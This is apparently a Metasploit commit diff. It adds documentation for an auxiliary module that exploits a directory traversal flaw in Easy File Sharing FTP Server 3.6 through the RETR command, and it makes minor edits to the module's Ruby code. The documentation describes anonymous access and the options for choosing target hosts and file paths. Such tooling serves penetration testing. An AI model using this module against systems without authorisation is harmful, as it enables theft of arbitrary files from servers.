Update easy_file_sharing_ftp and add documentation

wchen-r7 · wchen-r7 · commit 8afe6a906141 · 2017-03-15T16:14:41.000-05:00
diff --git a/documentation/modules/auxiliary/scanner/ftp/easy_file_sharing_ftp.md b/documentation/modules/auxiliary/scanner/ftp/easy_file_sharing_ftp.md
@@ -0,0 +1,27 @@
+This module exploits a directory traversal vulnerability in Easy File Sharing FTP Server 3.6, or
+prior. It abuses the RETR command in FTP in order to retrieve a file outside the shared directory.
+
+By default, anonymous access is allowed by the FTP server.
+
+## Vulnerable Application
+
+Easy File Sharing FTP Server version 3.6 or prior should be affected. You can download the
+vulnerable application from the official website:
+
+http://www.efssoft.com/efsfs.exe
+
+## Options
+
+Since the FTP server allows anonymous access, by default, you only need to configure:
+
+**RHOSTS**
+
+The FTP server IP address.
+
+**PATH**
+
+The file you wish to download. Assume this path starts from C:\
+
+## Demonstration
+
+![ftp](https://cloud.githubusercontent.com/assets/1170914/23971054/4fdc2b08-099a-11e7-88ea-67a678628e49.gif)
diff --git a/modules/auxiliary/scanner/ftp/easy_file_sharing_ftp.rb b/modules/auxiliary/scanner/ftp/easy_file_sharing_ftp.rb
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Easy File Sharing FTP Server Version 3.6 and Earlier Directory Traversal Information Disclosure',
+      'Name'           => 'Easy File Sharing FTP Server 3.6 Directory Traversal',
       'Description'    => %q{
         This module exploits a directory traversal vulnerability found in Easy File Sharing FTP Server Version 3.6 and Earlier.
         This vulnerability allows an attacker to download arbitrary files from the server by crafting
@@ -43,7 +43,7 @@ def check_host(ip)
     begin
       connect
       if /Easy File Sharing FTP Server/i === banner
-        return Exploit::CheckCode::Appears
+        return Exploit::CheckCode::Detected
       end
     ensure
       disconnect
@@ -58,7 +58,7 @@ def run_host(target_host)
       connect_login
       sock = data_connect
       if sock.nil?
-        error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'
+        error_msg = 'data_connect failed; posssible invalid response'
         print_status(error_msg)
         elog(error_msg)
       else
@@ -72,7 +72,7 @@ def run_host(target_host)
         # read the file data from the socket that we opened
         # dont assume theres still a sock to read from. Per #7582
         if sock.nil?
-          error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'
+          error_msg = 'data_connect failed; posssible invalid response'
           print_status(error_msg)
           elog(error_msg)
           return
